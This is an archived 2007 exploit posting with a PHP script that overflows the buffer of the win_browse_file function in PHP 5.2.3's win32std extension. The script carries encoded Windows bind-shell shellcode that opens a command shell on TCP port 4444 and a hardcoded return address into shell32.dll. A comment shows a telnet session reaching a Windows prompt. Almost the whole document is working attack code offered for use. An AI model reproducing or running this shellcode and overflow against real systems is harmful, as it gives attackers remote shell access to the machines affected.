
php523browse-overflow.txt

Posted Aug 24, 2007
Authored by Inphex

Local buffer overflow exploit for the win_browse_file function (win32std extension) in PHP versions 5.2.3 and below.

tags | exploit, overflow, local, php
SHA-256 | eed40468d521dbe25dc18d44f115c6ea69433c0c26f75d387a8c86a96659bcca

<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache>
7ffdf020 7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/

if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
$shellcode=
"\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4".
"\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c".
"\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa5\xa7\x2e\x2c".
"\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4d\x5b\x51\xbe".
"\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5d\xf9\x6d\x7f".
"\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc2\x36\xf4\xe6".
"\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xce\x53\x4f\x6f".
"\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe8\x7c\xc4\x01".
"\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x70\xdc\x05\x16".
"\xe8\x89\xfa\xaa\x9c\x3e\x8e\xf8\x03\x95\x8f\x2d\xd3\xde\x9d".
"\x32\x18\xb1\xa2\x1d\x01\xb8\xb8\xc4\x3c\x57\x4a\x0b\x6b\xc2".
"\x49\xf4\x43\x7a\x97\x03\x96\xd6\x70\xeb\x8e\x7a\x2c\x40\x7d".
"\x2e\x91\x35\xc2\x83\xea\x6a\xa2\x4b\x04\xd7\x4c\xdf\xaf\x06".
"\x05\xb7\x0b\xd2\x55\x8f\x03\x1c\x43\x65\xbc\xb3\x3e\x85\x6c".
"\x5b\x64\xd4\xa3\x75\x33\xd8\x6a\xd6\xee\xd9\x43\xb1\xf5\x6f".
"\xe2\x0b\xa2\x90\x3c\xdb\x18\x3b\x94\x23\x70\x50\x7e\x3b\x09".
"\x91\x06\x94\x16\xcb\xac\xe5\x38\x92\x24\x7e\xde\x33\xda\x13".
"\x97\x21\x76\xbc\xfe\x80\x4b\xb5\xe7\xb9\x17\x4f\x05\x0c\x58".
"\xbc\x63\x91\x1a\x6e\x8d\x2c\xb7\xe3\xfc\xcb\xff\xa8\x55\x80".
"\x68\xdd\x57\x64\x7e\xde\xd2\xcf\x80\xf6\x47\x87\x2c\xa6\x26".
"\x76\xbb\x49\x99\x29\x6e\x1b\xe6\x1a\xf8\x36\xc1\x9e\x37\x1b".
"\x0e\x76\xad\x63\x0f\x40\xcd\x4c\x64\xf8\xcd\xee\xbe\x63\xd1".
"\x27\x6c\x93\xfd\xa0\x60\xe1\xfa\x6f\xd3\x09\xd4\x6f\x03\xf5".
"\xd9\x8f";

$eip = "\xDC\x1C\x9C\x7C"; //shell32.dll
win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXX\x20\xf0\xfd\x7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) );
?>
